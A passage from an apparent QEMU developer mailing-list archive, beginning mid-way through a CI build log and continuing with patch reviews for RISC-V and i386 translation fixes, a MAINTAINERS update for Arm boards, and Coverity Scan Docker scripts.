'/var/tmp/patchew-tester-tmp-9fm5emqg/src/docker-src.2018-11-13-14.45.50.17193/qemu.tar.vroot'...
done.
Your branch is up-to-date with 'origin/test'.
Submodule 'dtc' (git://git.qemu-project.org/dtc.git) registered for path 'dtc'
Cloning into 
'/var/tmp/patchew-tester-tmp-9fm5emqg/src/docker-src.2018-11-13-14.45.50.17193/qemu.tar.vroot/dtc'...
Submodule path 'dtc': checked out '88f18909db731a627456f26d779445f84e449536'
Submodule 'ui/keycodemapdb' (git://git.qemu.org/keycodemapdb.git) registered 
for path 'ui/keycodemapdb'
Cloning into 
'/var/tmp/patchew-tester-tmp-9fm5emqg/src/docker-src.2018-11-13-14.45.50.17193/qemu.tar.vroot/ui/keycodemapdb'...
Submodule path 'ui/keycodemapdb': checked out 
'6b3d716e2b6472eb7189d3220552280ef3d832ce'
  COPYRUNNER
RUN test-quick in qemu:centos7 
Packages installed:
SDL-devel-1.2.15-14.el7.x86_64
bison-3.0.4-1.el7.x86_64
bzip2-1.0.6-13.el7.x86_64
bzip2-devel-1.0.6-13.el7.x86_64
ccache-3.3.4-1.el7.x86_64
csnappy-devel-0-6.20150729gitd7bc683.el7.x86_64
flex-2.5.37-3.el7.x86_64
gcc-4.8.5-28.el7_5.1.x86_64
gettext-0.19.8.1-2.el7.x86_64
git-1.8.3.1-14.el7_5.x86_64
glib2-devel-2.54.2-2.el7.x86_64
libaio-devel-0.3.109-13.el7.x86_64
libepoxy-devel-1.3.1-2.el7_5.x86_64
libfdt-devel-1.4.6-1.el7.x86_64
lzo-devel-2.06-8.el7.x86_64
make-3.82-23.el7.x86_64
mesa-libEGL-devel-17.2.3-8.20171019.el7.x86_64
mesa-libgbm-devel-17.2.3-8.20171019.el7.x86_64
nettle-devel-2.7.1-8.el7.x86_64
package g++ is not installed
package librdmacm-devel is not installed
pixman-devel-0.34.0-1.el7.x86_64
spice-glib-devel-0.34-3.el7_5.1.x86_64
spice-server-devel-0.14.0-2.el7_5.4.x86_64
tar-1.26-34.el7.x86_64
vte-devel-0.28.2-10.el7.x86_64
xen-devel-4.6.6-12.el7.x86_64
zlib-devel-1.2.7-17.el7.x86_64

Environment variables:
PACKAGES=bison bzip2 bzip2-devel ccache csnappy-devel flex  
   g++ gcc gettext git glib2-devel libaio-devel 
libepoxy-devel libfdt-devel librdmacm-devel lzo-devel make 
mesa-libEGL-devel mesa-libgbm-devel nettle-devel pixman-devel 
SDL-devel spice-glib-devel spice-server-devel tar vte-devel 
xen-devel zlib-devel
HOSTNAME=6697295bc889
MAKEFLAGS= -j8
J=8
CCACHE_DIR=/var/tmp/ccache
EXTRA_CONFIGURE_OPTS=
V=
SHOW_ENV=1
PATH=/usr/lib/ccache:/usr/lib64/ccache:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/
TARGET_LIST=
SHLVL=1
HOME=/home/patchew
TEST_DIR=/tmp/qemu-test
FEATURES= dtc
DEBUG=
_=/usr/bin/env

Configure options:
--enable-werror --target-list=x86_64-softmmu,aarch64-softmmu 
--prefix=/tmp/qemu-test/install
No C++ compiler available; disabling C++ specific optional code
Install prefix/tmp/qemu-test/install
BIOS directory/tmp/qemu-test/install/share/qemu
firmware path /tmp/qemu-test/install/share/qemu-firmware
binary directory  /tmp/qemu-test/install/bin
library directory /tmp/qemu-test/install/lib
module directory  /tmp/qemu-test/install/lib/qemu
libexec directory /tmp/qemu-test/install/libexec
include directory /tmp/qemu-test/install/include
config directory  /tmp/qemu-test/install/etc
local state directory   /tmp/qemu-test/install/var
Manual directory  /tmp/qemu-test/install/share/man
ELF interp prefix /usr/gnemul/qemu-%M
Source path   /tmp/qemu-test/src
GIT binarygit
GIT submodules
C compilercc
Host C compiler   cc
C++ compiler  
Objective-C compiler cc
ARFLAGS  

Re: [Qemu-devel] [PATCH 1/2] target/riscv: Fix FCLASS_D being treated as RV64 only

[Alistair Francis]

On Thu, Nov 8, 2018 at 4:07 AM Bastian Koppelmann
 wrote:
>
> Signed-off-by: Bastian Koppelmann 

Reviewed-by: Alistair Francis 

Alistair

> ---
>  target/riscv/translate.c | 4 +++-
>  1 file changed, 3 insertions(+), 1 deletion(-)
>
> diff --git a/target/riscv/translate.c b/target/riscv/translate.c
> index 18d7b6d147..5359088e24 100644
> --- a/target/riscv/translate.c
> +++ b/target/riscv/translate.c
> @@ -1237,13 +1237,14 @@ static void gen_fp_arith(DisasContext *ctx, uint32_t 
> opc, int rd,
>  tcg_temp_free(t0);
>  break;
>
> -#if defined(TARGET_RISCV64)
>  case OPC_RISC_FMV_X_D:
>  /* also OPC_RISC_FCLASS_D */
>  switch (rm) {
> +#if defined(TARGET_RISCV64)
>  case 0: /* FMV */
>  gen_set_gpr(rd, cpu_fpr[rs1]);
>  break;
> +#endif
>  case 1:
>  t0 = tcg_temp_new();
>  gen_helper_fclass_d(t0, cpu_fpr[rs1]);
> @@ -1255,6 +1256,7 @@ static void gen_fp_arith(DisasContext *ctx, uint32_t 
> opc, int rd,
>  }
>  break;
>
> +#if defined(TARGET_RISCV64)
>  case OPC_RISC_FMV_D_X:
>  t0 = tcg_temp_new();
>  gen_get_gpr(t0, rs1);
> --
> 2.19.1
>
>

Re: [Qemu-devel] [PATCH 2/2] target/riscv: Fix sfence.vm/a both available in any priv version

[Alistair Francis]

On Thu, Nov 8, 2018 at 4:07 AM Bastian Koppelmann
 wrote:
>
> sfence.vm has been replaced in priv v1.10 spec by sfence.vma.
>
> Reported-by: Richard Henderson 
> Signed-off-by: Bastian Koppelmann 

Reviewed-by: Alistair Francis 

Alistair

> ---
>  target/riscv/translate.c | 18 +-
>  1 file changed, 13 insertions(+), 5 deletions(-)
>
> diff --git a/target/riscv/translate.c b/target/riscv/translate.c
> index 5359088e24..f44eb9c41b 100644
> --- a/target/riscv/translate.c
> +++ b/target/riscv/translate.c
> @@ -1292,10 +1292,14 @@ static void gen_system(CPURISCVState *env, 
> DisasContext *ctx, uint32_t opc,
>  #ifndef CONFIG_USER_ONLY
>  /* Extract funct7 value and check whether it matches SFENCE.VMA */
>  if ((opc == OPC_RISC_ECALL) && ((csr >> 5) == 9)) {
> -/* sfence.vma */
> -/* TODO: handle ASID specific fences */
> -gen_helper_tlb_flush(cpu_env);
> -return;
> +if (env->priv_ver == PRIV_VERSION_1_10_0) {
> +/* sfence.vma */
> +/* TODO: handle ASID specific fences */
> +gen_helper_tlb_flush(cpu_env);
> +return;
> +} else {
> +gen_exception_illegal(ctx);
> +}
>  }
>  #endif
>
> @@ -1342,7 +1346,11 @@ static void gen_system(CPURISCVState *env, 
> DisasContext *ctx, uint32_t opc,
>  gen_helper_wfi(cpu_env);
>  break;
>  case 0x104: /* SFENCE.VM */
> -gen_helper_tlb_flush(cpu_env);
> +if (env->priv_ver <= PRIV_VERSION_1_09_1) {
> +gen_helper_tlb_flush(cpu_env);
> +} else {
> +gen_exception_illegal(ctx);
> +}
>  break;
>  #endif
>  default:
> --
> 2.19.1
>
>

Re: [Qemu-devel] [PATCH] MAINTAINERS: list myself as maintainer for various Arm boards

[Alistair Francis]

On Thu, Nov 8, 2018 at 5:41 AM Peter Maydell  wrote:
>
> In practice for most of the more-or-less orphan Arm board models,
> I will review patches and put them in via the target-arm tree.
> So list myself as an "Odd Fixes" status maintainer for them.
>
> This commit downgrades these boards to "Odd Fixes":
>  * Allwinner-A10
>  * Exynos
>  * Calxeda Highbank
>  * Canon DIGIC
>  * Musicpal
>  * nSeries
>  * Palm
>  * PXA2xx
>
> Signed-off-by: Peter Maydell 
> ---
> Thomas Huth sent a patch which only addressed collie, but
> let's be consistent.
>
> The set of downgrades to odd-fixes is based mostly on my
> subjective impression of whether anybody has made any changes
> to the board models over the last year or so, so it's quite
> possible I've forgotten that one of them is in better shape
> maintainer-activity-wise. If the maintainers for those boards
> disagree (cc'd) I'm happy to re-upgrade them to Maintained.
>
> Arguably it would be nice to have a letter prefix for "this
> is the person who will deal with getting the patch into the
> tree, but somebody else will be the primary maintainer for
> patch review" -- that's the situation for the maintained/
> active boards like ASpeed.
> ---
>  MAINTAINERS | 36 +++-
>  1 file changed, 27 insertions(+), 9 deletions(-)
>
> diff --git a/MAINTAINERS b/MAINTAINERS
> index 0d68e4bc5eb..4443105686d 100644
> --- a/MAINTAINERS
> +++ b/MAINTAINERS
> @@ -436,8 +436,9 @@ ARM Machines
>  
>  Allwinner-a10
>  M: Beniamino Galvani 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: hw/*/allwinner*
>  F: include/hw/*/allwinner*
>  F: hw/arm/cubieboard.c
> @@ -496,27 +497,31 @@ F: tests/test-arm-mptimer.c
>
>  Exynos
>  M: Igor Mitsyanko 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: hw/*/exynos*
>  F: include/hw/arm/exynos4210.h
>
>  Calxeda Highbank
>  M: Rob Herring 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: hw/arm/highbank.c
>  F: hw/net/xgmac.c
>
>  Canon DIGIC
>  M: Antony Pavlov 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: include/hw/arm/digic.h
>  F: hw/*/digic*
>
>  Gumstix
>  M: Philippe Mathieu-Daudé 
> +M: Peter Maydell 
>  L: qemu-devel@nongnu.org
>  L: qemu-...@nongnu.org
>  S: Odd Fixes
> @@ -524,8 +529,9 @@ F: hw/arm/gumstix.c
>
>  i.MX31
>  M: Peter Chubb 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Odd fixes
> +S: Odd Fixes
>  F: hw/*/imx*
>  F: include/hw/*/imx*
>  F: hw/arm/kzm.c
> @@ -555,20 +561,23 @@ F: include/hw/misc/iotkit-sysinfo.h
>
>  Musicpal
>  M: Jan Kiszka 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: hw/arm/musicpal.c
>
>  nSeries
>  M: Andrzej Zaborowski 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: hw/arm/nseries.c
>
>  Palm
>  M: Andrzej Zaborowski 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: hw/arm/palm.c
>
>  Real View
> @@ -582,8 +591,9 @@ F: include/hw/intc/realview_gic.h
>
>  PXA2XX
>  M: Andrzej Zaborowski 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
> -S: Maintained
> +S: Odd Fixes
>  F: hw/arm/mainstone.c
>  F: hw/arm/spitz.c
>  F: hw/arm/tosa.c
> @@ -608,6 +618,7 @@ F: hw/misc/arm_sysctl.c
>  Xilinx Zynq
>  M: Edgar E. Iglesias 
>  M: Alistair Francis 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
>  S: Maintained
>  F: hw/*/xilinx_*
> @@ -619,6 +630,7 @@ X: hw/ssi/xilinx_*
>  Xilinx ZynqMP
>  M: Alistair Francis 
>  M: Edgar E. Iglesias 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
>  S: Maintained
>  F: hw/*/xlnx*.c
> @@ -632,6 +644,7 @@ F: hw/arm/virt-acpi-build.c
>
>  STM32F205
>  M: Alistair Francis 
> +M: Peter Maydell 
>  S: Maintained
>  F: hw/arm/stm32f205_soc.c
>  F: hw/misc/stm32f2xx_syscfg.c
> @@ -643,11 +656,13 @@ F: include/hw/*/stm32*.h
>
>  Netduino 2
>  M: Alistair Francis 
> +M: Peter Maydell 
>  S: Maintained
>  F: hw/arm/netduino2.c

These two and the Xilinx boards seem a little out of place in this
patch. I agree they probably aren't maintained as well as they should
be, but the patch talks about orphaned boards and these four all have
active QEMU maintainers listed.

Alistair

>
>  SmartFusion2
>  M: Subbaraya Sundeep 
> +M: Peter Maydell 
>  S: Maintained
>  F: hw/arm/msf2-soc.c
>  F: hw/misc/msf2-sysreg.c
> @@ -660,11 +675,13 @@ F: include/hw/ssi/mss-spi.h
>
>  Emcraft M2S-FG484
>  M: Subbaraya Sundeep 
> +M: Peter Maydell 
>  S: Maintained
>  F: hw/arm/msf2-som.c
>
>  ASPEED BMCs
>  M: Cédric Le Goater 
> +M: Peter Maydell 
>  R: Andrew Jeffery 
>  R: Joel Stanley 
>  L: qemu-...@nongnu.org
> @@ -676,6 +693,7 @@ F: include/hw/net/ftgmac100.h
>
>  NRF51
>  M: Joel Stanley 
> +M: Peter Maydell 
>  L: qemu-...@nongnu.org
>  S: Maintained
>  F: hw/arm/nrf51_soc.c
> --
> 2.19.1
>
>

Re: [Qemu-devel] [PATCH 2/2] scripts/coverity-scan: Add Docker support

[Philippe Mathieu-Daudé]

On 13/11/18 19:46, Peter Maydell wrote:

Add support for running the Coverity Scan tools inside a Docker
container rather than directly on the host system.

Signed-off-by: Peter Maydell 
---
  scripts/coverity-scan/coverity-scan.docker | 120 +
  scripts/coverity-scan/run-coverity-scan|  58 ++
  2 files changed, 178 insertions(+)
  create mode 100644 scripts/coverity-scan/coverity-scan.docker

diff --git a/scripts/coverity-scan/coverity-scan.docker 
b/scripts/coverity-scan/coverity-scan.docker
new file mode 100644
index 000..81f69459954
--- /dev/null
+++ b/scripts/coverity-scan/coverity-scan.docker
@@ -0,0 +1,120 @@
+# syntax=docker/dockerfile:1.0.0-experimental
+#
+# Docker setup for running the "Coverity Scan" tools over the source
+# tree and uploading them to the website, as per
+# https://scan.coverity.com/projects/qemu/builds/new
+# We do this on a fixed config (currently Fedora 28 with a known
+# set of dependencies and a configure command that enables a specific
+# set of options) so that random changes don't result in our accidentally
+# dropping some files from the scan.
+# The work of actually doing the build is handled by the
+# run-coverity-scan script.
+
+
+FROM fedora:28
+ENV PACKAGES \
+alsa-lib-devel \
+bc \
+bison \
+bluez-libs-devel \
+brlapi-devel \
+bzip2 \
+bzip2-devel \
+ccache \
+clang \
+curl \
+cyrus-sasl-devel \
+device-mapper-multipath-devel \
+findutils \
+flex \
+gcc \
+gcc-c++ \
+gettext \
+git \
+glib2-devel \
+glusterfs-api-devel \
+gnutls-devel \
+gtk3-devel \
+hostname \
+libaio-devel \
+libasan \
+libattr-devel \
+libcap-devel \
+libcap-ng-devel \
+libcurl-devel \
+libepoxy-devel \
+libfdt-devel \
+libgbm-devel \
+libiscsi-devel \
+libjpeg-devel \
+libnfs-devel \
+libpng-devel \
+librbd-devel \
+libseccomp-devel \
+libssh2-devel \
+libubsan \
+libudev-devel \
+libusbx-devel \
+libxml2-devel \
+llvm \
+lzo-devel \
+make \
+mingw32-bzip2 \
+mingw32-curl \
+mingw32-glib2 \
+mingw32-gmp \
+mingw32-gnutls \
+mingw32-gtk3 \
+mingw32-libjpeg-turbo \
+mingw32-libpng \
+mingw32-libssh2 \
+mingw32-libtasn1 \
+mingw32-nettle \
+mingw32-pixman \
+mingw32-pkg-config \
+mingw32-SDL2 \
+mingw64-bzip2 \
+mingw64-curl \
+mingw64-glib2 \
+mingw64-gmp \
+mingw64-gnutls \
+mingw64-gtk3 \
+mingw64-libjpeg-turbo \
+mingw64-libpng \
+mingw64-libssh2 \
+mingw64-libtasn1 \
+mingw64-nettle \
+mingw64-pixman \
+mingw64-pkg-config \
+mingw64-SDL2 \
+ncurses-devel \
+nettle-devel \
+nss-devel \
+numactl-devel \
+perl \
+pixman-devel \
+pulseaudio-libs-devel \
+python3 \
+PyYAML \
+rdma-core-devel \
+SDL2-devel \
+snappy-devel \
+sparse \
+spice-server-devel \
+systemtap-sdt-devel \
+tar \
+usbredir-devel \
+virglrenderer-devel \
+vte3-devel \
+wget \
+which \
+xen-devel \
+xfsprogs-devel \
+zlib-devel
+ENV QEMU_CONFIGURE_OPTS --python=/usr/bin/python3
+
+RUN dnf install -y $PACKAGES
+RUN rpm -q $PACKAGES | sort > /packages.txt
+ENV COVERITY_TOOL_BASE=/coverity-tools
+COPY run-coverity-scan run-coverity-scan
+RUN --mount=type=secret,id=coverity.token,required ./run-coverity-scan 
--update-tools-only --tokenfile /run/secrets/coverity.token


Calling "make docket-image-fedora" you can reduce this script to:

-- >8 --
FROM qemu:fedora
ENV PACKAGES \
$PACKAGES \
alsa-lib-devel \
curl \
cyrus-sasl-devel \
libepoxy-devel \
libgbm-devel \
libiscsi-devel \
libnfs-devel \
libseccomp-devel \
libudev-devel \
pulseaudio-libs-devel \
rdma-core-devel \
wget \
xfsprogs-devel

RUN dnf install -y $PACKAGES
RUN rpm -q $PACKAGES | sort > /packages.txt
ENV COVERITY_TOOL_BASE=/coverity-tools
COPY run-coverity-scan run-coverity-scan
RUN --mount=type=secret,id=coverity.token,required ./run-coverity-scan 
--update-tools-only --tokenfile /run/secrets/coverity.token

---

sharing a big docker layer.

Re: [Qemu-devel] [PATCH] target/i386: Generate #UD when applying LOCK to a register destination

[Philippe Mathieu-Daudé]

On Tue, Nov 13, 2018 at 8:36 PM Richard Henderson
 wrote:
>
> Fixes a TCG crash due to attempting the atomic operation without
> having set up the address first.  This does not attempt to fix
> all of the other missing checks for LOCK.
>
> Fixes: a7cee522f35
> Fixes: https://bugs.launchpad.net/qemu/+bug/1803160
> Signed-off-by: Richard Henderson 

Reviewed-by: Philippe Mathieu-Daudé 
Tested-by: Philippe Mathieu-Daudé 

> ---
>  target/i386/translate.c | 35 ---
>  1 file changed, 20 insertions(+), 15 deletions(-)
>
> diff --git a/target/i386/translate.c b/target/i386/translate.c
> index f8bc7680af..0dd5fbe45c 100644
> --- a/target/i386/translate.c
> +++ b/target/i386/translate.c
> @@ -1268,10 +1268,30 @@ static void gen_helper_fp_arith_STN_ST0(int op, int 
> opreg)
>  }
>  }
>
> +static void gen_exception(DisasContext *s, int trapno, target_ulong cur_eip)
> +{
> +gen_update_cc_op(s);
> +gen_jmp_im(s, cur_eip);
> +gen_helper_raise_exception(cpu_env, tcg_const_i32(trapno));
> +s->base.is_jmp = DISAS_NORETURN;
> +}
> +
> +/* Generate #UD for the current instruction.  The assumption here is that
> +   the instruction is known, but it isn't allowed in the current cpu mode.  
> */
> +static void gen_illegal_opcode(DisasContext *s)
> +{
> +gen_exception(s, EXCP06_ILLOP, s->pc_start - s->cs_base);
> +}
> +
>  /* if d == OR_TMP0, it means memory operand (address in A0) */
>  static void gen_op(DisasContext *s1, int op, TCGMemOp ot, int d)
>  {
>  if (d != OR_TMP0) {
> +if (s1->prefix & PREFIX_LOCK) {
> +/* Lock prefix when destination is not memory.  */
> +gen_illegal_opcode(s1);
> +return;
> +}
>  gen_op_mov_v_reg(s1, ot, s1->T0, d);
>  } else if (!(s1->prefix & PREFIX_LOCK)) {
>  gen_op_ld_v(s1, ot, s1->T0, s1->A0);
> @@ -2469,21 +2489,6 @@ static void gen_leave(DisasContext *s)
>  gen_op_mov_reg_v(s, a_ot, R_ESP, s->T1);
>  }
>
> -static void gen_exception(DisasContext *s, int trapno, target_ulong cur_eip)
> -{
> -gen_update_cc_op(s);
> -gen_jmp_im(s, cur_eip);
> -gen_helper_raise_exception(cpu_env, tcg_const_i32(trapno));
> -s->base.is_jmp = DISAS_NORETURN;
> -}
> -
> -/* Generate #UD for the current instruction.  The assumption here is that
> -   the instruction is known, but it isn't allowed in the current cpu mode.  
> */
> -static void gen_illegal_opcode(DisasContext *s)
> -{
> -gen_exception(s, EXCP06_ILLOP, s->pc_start - s->cs_base);
> -}
> -
>  /* Similarly, except that the assumption here is that we don't decode
> the instruction at all -- either a missing opcode, an unimplemented
> feature, or just a bogus instruction stream.  */
> --
> 2.17.2
>

Re: [Qemu-devel] [PATCH 1/2] scripts/run-coverity-scan: Script to run Coverity Scan build

[Eric Blake]

On 11/13/18 1:21 PM, Peter Maydell wrote:



set -e...


+check_upload_permissions() {



...and shell functions do NOT intuitively do what you would think. It's
almost always better to use explicit error checking than to rely on set -e
as a crutch, because then you don't get surprises.


I think we had this conversation with last year's version
of this script too :-)  As you say, the use of functions
makes it maybe better to use explicit error checking -- but
is there a standard syntax for that that doesn't make
basic
  foo
  bar
  baz
"do these things in order" code look weird and require special care?
At least with set -e you do get error checking, whereas scripts without
it tend to just plough on regardless (look at configure, which doesn't
use set -e but doesn't have explicit checking either).


I've seen both:

foo &&
bar &&
baz

and

foo || fail
bar || fail
baz || fail

for some variation of a 'fail' function.  But yeah, once you start 
having to worry about checking everything yourself (or realizing which 
lines don't need checking), you find out how much of a crutch 'set -e' 
tries to be, and then wonder how it ever worked (for the number of cases 
where 'set -e' does not actually catch failure, and cannot be re-enabled 
in smaller scopes).



+TOOLBIN="$(cd "$COVERITY_TOOL_BASE" && echo
$(pwd)/coverity_tool/cov-analysis-*/bin)"



If $CDPATH is set and $COVERITY_TOOL_BASE does not contain /, this could
result in garbage being prepended to TOOLBIN as output from the 'cd'. Also,
$PWD is nicer than $(pwd); but are you sure the glob in cov-analysis-* won't
select too many files?


The glob is not great, but it is necessary to make the script
robust over new versions of the tools, which put the version
number in the cov-analysis-whatever directory name. If
we do ever get more than one file then the "test -x" below
will fail, and we'll be able to investigate and fix up the script.


Yeah, I think you're okay on that front.



CDPATH sounds like a horrific misfeature designed for breaking
scripts, so I'm not very interested in trying to work around it.
We don't seem to worry about this in configure either.
(I suppose we could just unset it at the start of the script.)


Autoconf 'configure' scripts do just that (unset CDPATH up front).  If 
someone ever complains that it actually broke for them, we'll make the 
fix; until then, I can live with the risk.


--
Eric Blake, Principal Software Engineer
Red Hat, Inc.   +1-919-301-3266
Virtualization:  qemu.org | libvirt.org

Re: [Qemu-devel] [PATCH v5 00/14] arm: nRF51 Devices and Microbit Support

[no-reply]

Hi,

This series failed docker-mingw@fedora build test. Please find the testing 
commands and
their output below. If you have Docker installed, you can probably reproduce it
locally.

Type: series
Message-id: 20181112214224.31560-1-cont...@steffen-goertz.de
Subject: [Qemu-devel] [PATCH v5 00/14] arm: nRF51 Devices and Microbit Support

=== TEST SCRIPT BEGIN ===
#!/bin/bash
time make docker-test-mingw@fedora SHOW_ENV=1 J=8
=== TEST SCRIPT END ===

Updating 3c8cf5a9c21ff8782164d1def7f44bd888713384
From https://github.com/patchew-project/qemu
   6ff1446989..cb968d275c  master -> master
 * [new tag]   
patchew/1542135956-3780-1-git-send-email-aleksandar.marko...@rt-rk.com -> 
patchew/1542135956-3780-1-git-send-email-aleksandar.marko...@rt-rk.com
 t [tag update]patchew/20181113165247.4806-1-sa...@linux.intel.com 
-> patchew/20181113165247.4806-1-sa...@linux.intel.com
 * [new tag]   
patchew/20181113180154.17903-1-richard.hender...@linaro.org -> 
patchew/20181113180154.17903-1-richard.hender...@linaro.org
 * [new tag]   
patchew/20181113184641.4492-1-peter.mayd...@linaro.org -> 
patchew/20181113184641.4492-1-peter.mayd...@linaro.org
Switched to a new branch 'test'
187f1fc84c arm: Add Clock peripheral stub to NRF51 SOC
46c8bafa10 tests/microbit-test: Add Tests for nRF51 Timer
4a8e69516c arm: Instantiate NRF51 Timers
48bafc25c5 hw/timer/nrf51_timer: Add nRF51 Timer peripheral
300ab01b3e tests/microbit-test: Add Tests for nRF51 GPIO
2d8d566dda arm: Instantiate NRF51 general purpose I/O
b5e2ea643d hw/gpio/nrf51_gpio: Add nRF51 GPIO peripheral
76a11e0531 tests: Add bbc:microbit / nRF51 test suite
00b8265b8b arm: Instantiate NRF51 special NVM's and NVMC
faacca4fcb hw/nvram/nrf51_nvm: Add nRF51 non-volatile memories
3619b14640 arm: Instantiate NRF51 random number generator
ca058f1721 hw/misc/nrf51_rng: Add NRF51 random number generator peripheral
bfbb2b5de5 arm: Add header to host common definition for nRF51 SOC peripherals
8e46d5f624 qtest: Add set_irq_in command to set IRQ/GPIO level

=== OUTPUT BEGIN ===
  BUILD   fedora
make[1]: Entering directory '/var/tmp/patchew-tester-tmp-l04dkvb6/src'
  GEN 
/var/tmp/patchew-tester-tmp-l04dkvb6/src/docker-src.2018-11-13-14.44.52.16484/qemu.tar
Cloning into 
'/var/tmp/patchew-tester-tmp-l04dkvb6/src/docker-src.2018-11-13-14.44.52.16484/qemu.tar.vroot'...
done.
Your branch is up-to-date with 'origin/test'.
Submodule 'dtc' (git://git.qemu-project.org/dtc.git) registered for path 'dtc'
Cloning into 
'/var/tmp/patchew-tester-tmp-l04dkvb6/src/docker-src.2018-11-13-14.44.52.16484/qemu.tar.vroot/dtc'...
Submodule path 'dtc': checked out '88f18909db731a627456f26d779445f84e449536'
Submodule 'ui/keycodemapdb' (git://git.qemu.org/keycodemapdb.git) registered 
for path 'ui/keycodemapdb'
Cloning into 
'/var/tmp/patchew-tester-tmp-l04dkvb6/src/docker-src.2018-11-13-14.44.52.16484/qemu.tar.vroot/ui/keycodemapdb'...
Submodule path 'ui/keycodemapdb': checked out 
'6b3d716e2b6472eb7189d3220552280ef3d832ce'
  COPYRUNNER
RUN test-mingw in qemu:fedora 
Packages installed:
SDL2-devel-2.0.8-5.fc28.x86_64
bc-1.07.1-5.fc28.x86_64
bison-3.0.4-9.fc28.x86_64
bluez-libs-devel-5.50-1.fc28.x86_64
brlapi-devel-0.6.7-19.fc28.x86_64
bzip2-1.0.6-26.fc28.x86_64
bzip2-devel-1.0.6-26.fc28.x86_64
ccache-3.4.2-2.fc28.x86_64
clang-6.0.1-1.fc28.x86_64
device-mapper-multipath-devel-0.7.4-3.git07e7bd5.fc28.x86_64
findutils-4.6.0-19.fc28.x86_64
flex-2.6.1-7.fc28.x86_64
gcc-8.1.1-5.fc28.x86_64
gcc-c++-8.1.1-5.fc28.x86_64
gettext-0.19.8.1-14.fc28.x86_64
git-2.17.1-3.fc28.x86_64
glib2-devel-2.56.1-4.fc28.x86_64
glusterfs-api-devel-4.1.2-2.fc28.x86_64
gnutls-devel-3.6.3-3.fc28.x86_64
gtk3-devel-3.22.30-1.fc28.x86_64
hostname-3.20-3.fc28.x86_64
libaio-devel-0.3.110-11.fc28.x86_64
libasan-8.1.1-5.fc28.x86_64
libattr-devel-2.4.48-3.fc28.x86_64
libcap-devel-2.25-9.fc28.x86_64
libcap-ng-devel-0.7.9-4.fc28.x86_64
libcurl-devel-7.59.0-6.fc28.x86_64
libfdt-devel-1.4.6-5.fc28.x86_64
libpng-devel-1.6.34-6.fc28.x86_64
librbd-devel-12.2.7-1.fc28.x86_64
libssh2-devel-1.8.0-7.fc28.x86_64
libubsan-8.1.1-5.fc28.x86_64
libusbx-devel-1.0.22-1.fc28.x86_64
libxml2-devel-2.9.8-4.fc28.x86_64
llvm-6.0.1-6.fc28.x86_64
lzo-devel-2.08-12.fc28.x86_64
make-4.2.1-6.fc28.x86_64
mingw32-SDL2-2.0.5-3.fc27.noarch
mingw32-bzip2-1.0.6-9.fc27.noarch
mingw32-curl-7.57.0-1.fc28.noarch
mingw32-glib2-2.56.1-1.fc28.noarch
mingw32-gmp-6.1.2-2.fc27.noarch
mingw32-gnutls-3.6.2-1.fc28.noarch
mingw32-gtk3-3.22.30-1.fc28.noarch
mingw32-libjpeg-turbo-1.5.1-3.fc27.noarch
mingw32-libpng-1.6.29-2.fc27.noarch
mingw32-libssh2-1.8.0-3.fc27.noarch
mingw32-libtasn1-4.13-1.fc28.noarch
mingw32-nettle-3.4-1.fc28.noarch
mingw32-pixman-0.34.0-3.fc27.noarch
mingw32-pkg-config-0.28-9.fc27.x86_64
mingw64-SDL2-2.0.5-3.fc27.noarch
mingw64-bzip2-1.0.6-9.fc27.noarch
mingw64-curl-7.57.0-1.fc28.noarch
mingw64-glib2-2.56.1-1.fc28.noarch
mingw64-gmp-6.1.2-2.fc27.noarch
mingw64-gnutls-3.6.2-1.fc28.noarch

[Qemu-devel] [PATCH] target/i386: Generate #UD when applying LOCK to a register destination

[Richard Henderson]

Fixes a TCG crash due to attempting the atomic operation without
having set up the address first.  This does not attempt to fix
all of the other missing checks for LOCK.

Fixes: a7cee522f35
Fixes: https://bugs.launchpad.net/qemu/+bug/1803160
Signed-off-by: Richard Henderson 
---
 target/i386/translate.c | 35 ---
 1 file changed, 20 insertions(+), 15 deletions(-)

diff --git a/target/i386/translate.c b/target/i386/translate.c
index f8bc7680af..0dd5fbe45c 100644
--- a/target/i386/translate.c
+++ b/target/i386/translate.c
@@ -1268,10 +1268,30 @@ static void gen_helper_fp_arith_STN_ST0(int op, int 
opreg)
 }
 }
 
+static void gen_exception(DisasContext *s, int trapno, target_ulong cur_eip)
+{
+gen_update_cc_op(s);
+gen_jmp_im(s, cur_eip);
+gen_helper_raise_exception(cpu_env, tcg_const_i32(trapno));
+s->base.is_jmp = DISAS_NORETURN;
+}
+
+/* Generate #UD for the current instruction.  The assumption here is that
+   the instruction is known, but it isn't allowed in the current cpu mode.  */
+static void gen_illegal_opcode(DisasContext *s)
+{
+gen_exception(s, EXCP06_ILLOP, s->pc_start - s->cs_base);
+}
+
 /* if d == OR_TMP0, it means memory operand (address in A0) */
 static void gen_op(DisasContext *s1, int op, TCGMemOp ot, int d)
 {
 if (d != OR_TMP0) {
+if (s1->prefix & PREFIX_LOCK) {
+/* Lock prefix when destination is not memory.  */
+gen_illegal_opcode(s1);
+return;
+}
 gen_op_mov_v_reg(s1, ot, s1->T0, d);
 } else if (!(s1->prefix & PREFIX_LOCK)) {
 gen_op_ld_v(s1, ot, s1->T0, s1->A0);
@@ -2469,21 +2489,6 @@ static void gen_leave(DisasContext *s)
 gen_op_mov_reg_v(s, a_ot, R_ESP, s->T1);
 }
 
-static void gen_exception(DisasContext *s, int trapno, target_ulong cur_eip)
-{
-gen_update_cc_op(s);
-gen_jmp_im(s, cur_eip);
-gen_helper_raise_exception(cpu_env, tcg_const_i32(trapno));
-s->base.is_jmp = DISAS_NORETURN;
-}
-
